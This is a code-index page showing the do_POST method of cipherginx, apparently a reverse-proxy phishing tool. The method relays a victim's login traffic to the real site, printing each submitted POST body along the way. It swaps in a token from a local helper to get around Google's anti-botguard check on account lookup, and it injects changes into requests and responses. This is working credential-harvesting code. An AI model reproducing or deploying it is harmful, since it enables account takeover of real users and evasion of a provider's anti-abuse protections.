MCPcopy Index your code
hub / github.com/cipheras/cipherginx / do_POST

Method do_POST

cipherginx.py:214–269  ·  view source on GitHub ↗
(self, body=True)

Source from the content-addressed store, hash-verified

212 logging.info('sending [200] with no content to target')
213
214 def do_POST(self, body=True):
215 sent = False
216 try:
217 logging.info('path::'+self.path)
218 if blockPaths(self.path): return
219 hn = hostname
220 for _ in req_headers:
221 if _[0] in self.path:
222 for k,v in _[1].items():
223 if k=='Host': hn=v
224 url = 'https://' + hn + self.path.replace(domain,hostname.split('.',1)[1])
225 # Parse request
226 print('\n//'+self.command)
227 print(LIGHTGREEN + url + RESET)
228 req_header = self.parseHeaders()
229 # content-length injection
230 if self.headers['Content-Length'] == None:
231 content_len = 0
232 else:
233 content_len = int(self.headers['Content-Length'])
234 post_body = self.rfile.read(content_len)
235 print(GREEN, post_body, RESET)
236 ## google-anti-botguard
237 if '/accountlookup' in self.path:
238 token = requests.get("http://localhost:8081?e="+re.findall('f.req=%5B%22.*?%22',str(post_body))[0].split('%22')[1]).text
239 post_body = re.sub(b'identifier%22%2C%22%3C.*%22', b'identifier%22%2C%22%3C'+bytes(token,encoding='utf8')+b'%22', post_body)
240 ##
241 injbody = injectReqBody(post_body, self.path)
242 # Call the target hostname
243 resp = self.s.post(url, data=injbody, headers=injectHeaders(req_header, url, str(len(injbody)), self.path), verify=False,)
244 sent = True
245 if resp.history:
246 for r in resp.history:
247 print('Redirection: ' +BOLD+CYAN+ '[',r.status_code,'] ',r.url, RESET)
248 print(BGGREEN + str(resp.content) + RESET)
249 # Respond with the requested data
250 self.sendRespHeaders(resp)
251 if body:
252 inj_resp = injectRespBody(resp.content,self.path)
253 print(BGBLUE + str(inj_resp) + RESET)
254 self.send_header('Content-Length', len(inj_resp))
255 self.end_headers()
256 self.wfile.write(inj_resp)
257 else:
258 self.send_header('Content-Length', len(resp.content))
259 self.end_headers()
260 return
261 except Exception as e:
262 logging.error(RED + str(e))
263 logging.debug(e, exc_info=True)
264 # exit()
265 finally:
266 # self.finish()
267 if not sent:
268 self.send_error(200, 'No Content')
269 logging.info('sending [200] with no content to target')
270
271 def parseHeaders(self):

Callers

nothing calls this directly

Calls 6

parseHeadersMethod · 0.95
sendRespHeadersMethod · 0.95
blockPathsFunction · 0.85
injectReqBodyFunction · 0.85
injectHeadersFunction · 0.85
injectRespBodyFunction · 0.85

Tested by

no test coverage detected